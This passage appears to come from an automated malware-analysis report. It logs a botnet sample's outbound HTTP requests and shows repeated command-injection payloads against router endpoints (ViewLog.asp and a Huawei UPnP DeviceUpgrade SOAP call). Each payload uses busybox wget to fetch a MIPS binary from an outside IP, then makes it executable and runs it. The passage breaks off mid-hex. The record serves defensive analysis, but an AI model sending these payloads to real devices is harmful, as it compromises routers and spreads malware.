                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:08.454377890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.909550905 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.772022009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              181192.168.2.144682262.103.173.838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:51.001710892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              182192.168.2.145077494.187.111.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:51.005510092 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              183192.168.2.145945841.42.88.837215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:52.366086960 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:53.165361881 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:53.464356899 CET236INHTTP/1.1 500 Internal Server Error
                                              Content-Type: text/xml; charset="utf-8"
                                              Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                              EXT:
                                              Connection: Keep-Alive
                                              Content-Length: 398


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              184192.168.2.144843862.162.114.1978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.481309891 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:54.698731899 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:13:01 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:55.696122885 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:13:01 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>Apache Tomcat/7.0.59 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.59</h3></body></html>
                                              Nov 23, 2023 05:15:57.700167894 CET1227INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 989
                                              Date: Thu, 23 Nov 2023 04:13:01 GMT
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 